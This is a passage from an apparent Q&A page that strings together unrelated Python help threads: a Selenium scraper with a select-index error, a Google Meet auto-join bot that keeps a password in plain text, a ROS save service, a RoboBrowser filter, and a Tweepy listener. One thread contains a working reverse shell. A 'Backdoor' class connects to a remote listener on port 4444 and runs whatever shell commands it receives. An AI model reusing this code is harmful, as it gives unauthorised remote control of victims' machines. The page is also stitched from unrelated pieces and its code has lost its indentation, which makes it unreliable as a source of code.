i have written a code in selenium using chrome driver, it codes works fine on some days and some days it gives error.Below is my code:
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
import os
import time
import csv
driver = webdriver.Chrome("chromedriver.exe")
driver.get('https://maharerait.mahaonline.gov.in/searchlist/searchlist')
# try:
# element = WebDriverWait(driver, 100).until(
# EC.presence_of_element_located((By.ID, "Promoter"))
# )
# finally:
# print('0000000000000000000000')
# driver.quit()
time.sleep(1)
driver.find_element_by_id('Promoter').click()
divisionLength = len(Select(driver.find_element_by_id('Division')).options)
print('*********{}'.format(divisionLength))
firstRow = 0
titleRow = []
contentRows = []
gdistName = ""
gdivName = ""
for divisionElement in range(1,divisionLength):
selectDivision = Select(driver.find_element_by_id('Division'))
selectDivision.options
selectDivision.select_by_index(divisionElement)
time.sleep(1)
districtLength =
len(Select(driver.find_element_by_id('District')).options)
gdivName = (selectDivision.options)[divisionElement].text
while districtLength == 1:
print("43")
print(districtLength)
for districtElement in range(1,districtLength):
selectDistrict = Select(driver.find_element_by_id('District'))
selectDistrict.options
selectDistrict.select_by_index(districtElement)
gdistName = (selectDistrict.options)[districtElement].text
time.sleep(2)
projectLength =
len(Select(driver.find_element_by_id('Project')).options)
print('/------------------------------/')
print('/-----project number: {}-------/'.format(projectLength))
print('/------------------------------/')
if projectLength == 1:
continue
for projectElement in range(1,projectLength):
selectDistrict = Select(driver.find_element_by_id('District'))
selectDistrict.select_by_index(0)
selectDistrict.select_by_index(districtElement)
time.sleep(2)
gdistName = (selectDistrict.options)[districtElement].text
# selectProject.options
# while len(selectProject.options) == 1:
# print(len(selectProject.options))
# print("65")
# c = len(select.options)
# print('---------------{}'.format(c))
# titleRow = []
# contentRows = []
# firstRow = 0
# for i in range(1,c):
# select = Select(driver.find_element_by_id('Project'))
# while len(select.options) == 1:
# pass
selectProject = Select(driver.find_element_by_id('Project'))
time.sleep(2)
selectProject.select_by_index(projectElement)
driver.find_element_by_id('btnSearch').click()
tableRows =
driver.find_element_by_class_name('table').find_elements_by_tag_name('tr')
if firstRow == 0:
headRow = tableRows[0].find_elements_by_tag_name('th')
for headRowData in range(0,len(headRow)):
text =
headRow[headRowData].find_element_by_tag_name('span').text
titleRow.append(text)
firstRow = firstRow + 1
for dataRowsNumbers in range(1,len(tableRows)):
dataRow =
tableRows[dataRowsNumbers].find_elements_by_tag_name('td')
tempList = []
for dataRowContents in range(0,len(dataRow)):
try:
a_link =
dataRow[dataRowContents].find_element_by_tag_name('a').get_attribute('href')
tempList.append(str(a_link))
except NoSuchElementException:
tempList.append(str(dataRow[dataRowContents].text))
# if dataRow[dataRowContents].text == 'View':
# a_link =
dataRow[dataRowContents].find_element_by_tag_name('a').get_attribute('href')
# tempList.append(str(a_link))
# else:
#
tempList.append(str(dataRow[dataRowContents].text))
#print(dataRow[dataRowContents].text)
tempList.append(gdivName)
tempList.append(gdistName)
print(tempList)
contentRows.append(tempList)
# print('Automated check is over')
# print('Stored data in programs is as below:')
# print(contentRows)
with open("./data.csv",'w') as csvfile:
csvfile = csv.writer(csvfile, delimiter=',')
csvfile.writerow(titleRow)
csvfile.writerow("")
for i in range(0,len(contentRows)):
csvfile.writerow(contentRows[i])
driver.close()
Please excuse of intended spaces.
so i receive this error when i run it..
Traceback (most recent call last):
File "C:\Users\prince.bhatia\Desktop\Crawlers\Maha_Rera1.py", line 68, in
<module>
selectDistrict.select_by_index(districtElement)
File
"C:\Users\prince.bhatia\AppData\Local\Programs\Python\Python36\lib\site-
packages\selenium\webdriver\support\select.py", line 103, in select_by_index
raise NoSuchElementException("Could not locate element with index %d" %
index)
selenium.common.exceptions.NoSuchElementException: Message: Could not locate
element with index 2
Please , if someone can suggest me what to change , because it worked fine yesterday and not it is not working..It requires chrome driver to run
this is the website: https://maharerait.mahaonline.gov.in/searchlist/searchlist
try using select.select_by_value(districtElement) instead of index
Related
I have python 2 on my VM and my code is as follows:
#!/usr/bin/env python
import socket, json
class Listener:
def __init__(self, ip, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((ip, port))
listener.listen(0)
print("[+] Waiting for incoming connection")
self.connection, address = listener.accept()
print("[+] Got a connection from " + str(address))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_recieve(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_remotely(self, command):
self.reliable_send(command)
return self.reliable_recieve()
def run(self):
while True:
command = raw_input(">> ")
result = self.execute_remotely(command)
print(result)
my_listener = Listener("ip adress", 4444)
my_listener.run()
And my target computer has python 3 and the code as follows:
#!/usr/bin/env python
import socket, subprocess
import json
class Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_recieve(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_system_command(self, command):
return subprocess.check_output(command, shell=True)
def run(self):
while True:
command = self.reliable_recieve()
command_result = self.execute_system_command(command)
self.reliable_send(command_result)
connection.close()
my_backdoor = Backdoor("ip address", 4444)
my_backdoor.run()
When I run this I get the error mentioned in the subject. I have tried to decode the json_data with the utf-8 argument but the problem persists.
i get this screen. The listener model is working in my VM but in my real pc its show this error
enter image description here
and if i decode my json_data its show the error "Object of type bytes is not JSON serializable"
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from io import SEEK_END
import time
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
Path = "C:\Program Files (x86)\chromedriver.exe"
opt = Options()
opt.add_argument('--disable-blink-features=AutomationControlled')
opt.add_argument('--start-maximized')
opt.add_experimental_option("prefs", {
"profile.default_content_setting_values.media_stream_mic": 1,
"profile.default_content_setting_values.media_stream_camera": 1,
"profile.default_content_setting_values.geolocation": 0,
"profile.default_content_setting_values.notifications": 2
})
driver = webdriver.Chrome(options=opt , executable_path= Path)
with open("data2.txt", "r+") as f:
f.seek(0 , SEEK_END)
if f.tell() == 0:
MAILID = f.write("\n" + input("Enter your name_roll no (javets_6890) : "))
PASSWORD = f.write("\n" + input("Enter the password for your mail id : "))
else:
f.seek(0)
datalst = []
for i in f:
datalst.append(i.replace("\n",""))
print(datalst)
MAILID = datalst[0]
PASSWORD = datalst[1]
def methclass():
driver.get("https://classroom.google.com/u/0/h") #https://meet.google.com/lookup/bdzjc4fsl4?authuser=0&hs=179
wait = WebDriverWait.until(driver , 30)
try:
wait.until(EC.presence_of_element_located((By.NAME , "identifier")))
finally:
mailbox = driver.find_element_by_name("identifier") #looks for the mail id box in the sign in page
mailbox.send_keys(MAILID) #sends this text into the box for mail id
mailbox.send_keys(Keys.ENTER)
try:
wait.until(EC.presence_of_element_located((By.NAME , "password")))
finally:
passbox = driver.find_element_by_name("password") #looks for mail pass box
passbox.send_keys(PASSWORD) #sends pass to box
passbox.send_keys(Keys.ENTER)
time.sleep(10)
driver.get("https://meet.google.com/lookup/bdzjc4fsl4")
wait = WebDriverWait(driver , 180)
try:
wait.until(
EC.presence_of_element_located((By.CLASS_NAME, "Fxmcue"))) # sees whether join button is present or not
driver.refresh()
finally:
body = driver.find_element_by_xpath("//body")
body.send_keys(Keys.LEFT_CONTROL , "e")
body.send_keys(Keys.LEFT_CONTROL , "d")
join = driver.find_element_by_class_name("Fxmcue")
join.click()
time.sleep(2400)
driver.quit()
methclass()
How do I fix the attribute error?
The code ran fine until i added waits and try except blocks , i used time.sleep() instead of waits and the code ran just fine.
........................................................................................................................................................................................................................................................................................................................................................................................................
Your instantiation of wait object is wrong.
Instead of
wait = WebDriverWait.until(driver , 30)
use
wait = WebDriverWait(driver, 30)
I want to have a service 'save_readings' that automatically saves data from a rostopic into a file. But each time the service gets called, it doesn't save any file.
I've tried to run those saving-file code in python without using a rosservice and the code works fine.
I don't understand why this is happening.
#!/usr/bin/env python
# license removed for brevity
import rospy,numpy
from std_msgs.msg import String,Int32MultiArray,Float32MultiArray,Bool
from std_srvs.srv import Empty,EmptyResponse
import geometry_msgs.msg
from geometry_msgs.msg import WrenchStamped
import json
# import settings
pos_record = []
wrench_record = []
def ftmsg2listandflip(ftmsg):
return [ftmsg.wrench.force.x,ftmsg.wrench.force.y,ftmsg.wrench.force.z, ftmsg.wrench.torque.x,ftmsg.wrench.torque.y,ftmsg.wrench.torque.z]
def callback_pos(data):
global pos_record
pos_record.append(data.data)
def callback_wrench(data):
global wrench_record
ft = ftmsg2listandflip(data)
wrench_record.append([data.header.stamp.to_sec()] + ft)
def exp_listener():
stop_sign = False
rospy.Subscriber("stage_pos", Float32MultiArray, callback_pos)
rospy.Subscriber("netft_data", WrenchStamped, callback_wrench)
rospy.spin()
def start_read(req):
global pos_record
global wrench_record
pos_record = []
wrench_record = []
return EmptyResponse()
def save_readings(req):
global pos_record
global wrench_record
filename = rospy.get_param('save_file_name')
output_data = {'pos_list':pos_record, 'wrench_list': wrench_record }
rospy.loginfo("output_data %s",output_data)
with open(filename, 'w') as outfile: # write data to 'data.json'
print('dumping json file')
json.dump(output_data, outfile) #TODO: find out why failing to save the file.
outfile.close()
print("file saved")
rospy.sleep(2)
return EmptyResponse()
if __name__ == '__main__':
try:
rospy.init_node('lisener_node', log_level = rospy.INFO)
s_1 = rospy.Service('start_read', Empty, start_read)
s_1 = rospy.Service('save_readings', Empty, save_readings)
exp_listener()
print ('mylistener ready!')
except rospy.ROSInterruptException:
pass
Got it. I need to specify a path for the file to be saved.
save_path = '/home/user/catkin_ws/src/motionstage/'
filename = save_path + filename
I've got a program that sends a lot of requests to a website using RoboBrowser and gets the answers, but now I need to filter these answers to only the ones that don't have this string " Case Status Not Available " I tried to use beautifulsoup for it, but it is returning an error.
Here's the code so far:
import shlex
import subprocess
import os
import platform
from bs4 import BeautifulSoup
import re
import csv
import pickle
import requests
from robobrowser import RoboBrowser
def rename_files():
file_list = os.listdir(r"C:\\PROJECT\\pdfs")
print(file_list)
saved_path = os.getcwd()
print('Current working directory is '+saved_path)
os.chdir(r'C:\\PROJECT\\pdfs')
for file_name in file_list:
os.rename(file_name, file_name.translate(None, " "))
os.chdir(saved_path)
rename_files()
def run(command):
if platform.system() != 'Windows':
args = shlex.split(command)
else:
args = command
s = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, errors = s.communicate()
return s.returncode == 0, output, errors
# Change this to your PDF file base directory
base_directory = 'C:\\PROJECT\\pdfs'
if not os.path.isdir(base_directory):
print "%s is not a directory" % base_directory
exit(1)
# Change this to your pdf2htmlEX executable location
bin_path = 'C:\\Python27\\pdfminer-20140328\\tools\\pdf2txt.py'
if not os.path.isfile(bin_path):
print "Could not find %s" % bin_path
exit(1)
for dir_path, dir_name_list, file_name_list in os.walk(base_directory):
for file_name in file_name_list:
# If this is not a PDF file
if not file_name.endswith('.pdf'):
# Skip it
continue
file_path = os.path.join(dir_path, file_name)
# Convert your PDF to HTML here
args = (bin_path, file_name, file_path)
success, output, errors = run("python %s -o %s.html %s " %args)
if not success:
print "Could not convert %s to HTML" % file_path
print "%s" % errors
htmls_path = 'C:\\PROJECT'
with open ('score.csv', 'w') as f:
writer = csv.writer(f)
for dir_path, dir_name_list, file_name_list in os.walk(htmls_path):
for file_name in file_name_list:
if not file_name.endswith('.html'):
continue
with open(file_name) as markup:
soup = BeautifulSoup(markup.read())
text = soup.get_text()
match = re.findall("PA/(\S*)", text)#To remove the names that appear, just remove the last (\S*), to add them is just add the (\S*), before it there was a \s*
print(match)
writer.writerow(match)
for item in match:
data = item.split('/')
case_number = data[0]
case_year = data[1]
browser = RoboBrowser()
browser.open('http://www.pa.org.mt/page.aspx?n=63C70E73&CaseType=PA')
form = browser.get_forms()[0] # Get the first form on the page
form['ctl00$PageContent$ContentControl$ctl00$txtCaseNo'].value = case_number
form['ctl00$PageContent$ContentControl$ctl00$txtCaseYear'].value = case_year
browser.submit_form(form, submit=form['ctl00$PageContent$ContentControl$ctl00$btnSubmit'])
# Use BeautifulSoup to parse this data
print(browser.response.text)
souptwo = BeautifulSoup(browser.response.text)
texttwo = soup.get_text()
matchtwo = soup.findall('<td class="fieldData">Case Status Not Available</TD>')
if not matchtwo:
soupthree = BeautifulSoup(browser.response.text)
print soupthree
The error that returns is:
Traceback (most recent call last):
File "C:\PROJECT\pdfs\converterpluspa.py", line 87, in <module>
matchtwo = soup.findall('<td class="fieldData">Case Status Not Available</TD>')
TypeError: 'NoneType' object is not callable
Line 87 includes an attempt to call the method findall of soup. soup was defined in line 65 where BeautifulSoup was called to parse the contents of a file. Since the error diagnostic says that soup is None this means that BeautifulSoup was unable to parse that file.
I'm using Tweepy for the first time. Currently getting this error
---------------------------------------------------------------------------
IOError Traceback (most recent call last)
<ipython-input-11-cdd7ebe0c00f> in <module>()
----> 1 data_json = io.open('raw_tweets.json', mode='r', encoding='utf-8').read() #reads in the JSON file
2 data_python = json.loads(data_json)
3
4 csv_out = io.open('tweets_out_utf8.csv', mode='w', encoding='utf-8') #opens csv file
IOError: [Errno 2] No such file or directory: 'raw_tweets.json'
I've got a feeling that the code I've got isn't working. For example print(status) doesn't print anything. Also I see no saved CSV or JSON file in the directory.
I'm a newbie so any help/documentation you can offer would be great!
import time
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
import os
import json
import csv
import io
from pymongo import MongoClient
ckey = 'blah'
consumer_secret = 'blah'
access_token_key = 'blah'
access_token_secret = 'blah'
#start_time = time.time() #grabs the system time
keyword_list = ['keyword'] #track list
#Listener Class Override
class listener(StreamListener):
def __init__(self, start_time, time_limit=60):
self.time = start_time
self.limit = time_limit
self.tweet_data = []
def on_data(self, data):
saveFile = io.open('raw_tweets.json', 'a', encoding='utf-8')
while (time.time() - self.time) < self.limit:
try:
self.tweet_data.append(data)
return True
except BaseException, e:
print 'failed ondata,', str(e)
time.sleep(5)
pass
saveFile = io.open('raw_tweets.json', 'w', encoding='utf-8')
saveFile.write(u'[\n')
saveFile.write(','.join(self.tweet_data))
saveFile.write(u'\n]')
saveFile.close()
exit()
def on_error(self, status):
print status
class listener(StreamListener):
def __init__(self, start_time, time_limit=10):
self.time = start_time
self.limit = time_limit
def on_data(self, data):
while (time.time() - self.time) < self.limit:
print(data)
try:
client = MongoClient('blah', 27017)
db = client['blah']
collection = db['blah']
tweet = json.loads(data)
collection.insert(tweet)
return True
except BaseException as e:
print('failed ondata,')
print(str(e))
time.sleep(5)
pass
exit()
def on_error(self, status):
print(status)
data_json = io.open('raw_tweets.json', mode='r', encoding='utf-8').read() #reads in the JSON file
data_python = json.loads(data_json)
csv_out = io.open('tweets_out_utf8.csv', mode='w', encoding='utf-8') #opens csv file
UPDATED: Creates file but file is empty
import tweepy
import datetime
auth = tweepy.OAuthHandler('xxx', 'xxx')
auth.set_access_token('xxx', 'xxx')
class listener(tweepy.StreamListener):
def __init__(self, timeout, file_name, *args, **kwargs):
super(listener, self).__init__(*args, **kwargs)
self.start_time = None
self.timeout = timeout
self.file_name = file_name
self.tweet_data = []
def on_data(self, data):
if self.start_time is None:
self.start_time = datetime.datetime.now()
while (datetime.datetime.now() - self.start_time).seconds < self.timeout:
with open(self.file_name, 'a') as data_file:
data_file.write('\n')
data_file.write(data)
def on_error(self, status):
print status
l = listener(60, 'stack_raw_tweets.json')
mstream = tweepy.Stream(auth=auth, listener=l)
mstream.filter(track=['python'], async=True)
You are not creating a Stream for the listener. The last but one line of the code below does that. Followed by that you have to start the Stream, which is the last line. I must warn you that storing this in mongodb is the right thing to do as the file that I am storing it seems to grow easily to several GB. Also the file is not exactly a json. Each line in the file is a json. You must tweak it to your needs.
import tweepy
import datetime
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
class listener(tweepy.StreamListener):
def __init__(self, timeout, file_name, *args, **kwargs):
super(listener, self).__init__(*args, **kwargs)
self.start_time = None
self.timeout = timeout
self.file_name = file_name
self.tweet_data = []
def on_data(self, data):
if self.start_time is None:
self.start_time = datetime.datetime.now()
while (datetime.datetime.now() - self.start_time).seconds < self.timeout:
with open(self.file_name, 'a') as data_file:
data_file.write('\n')
data_file.write(data)
def on_error(self, status):
print status
l = listener(60, 'raw_tweets.json')
mstream = tweepy.Stream(auth=auth, listener=l)
mstream.filter(track=['python'], async=True)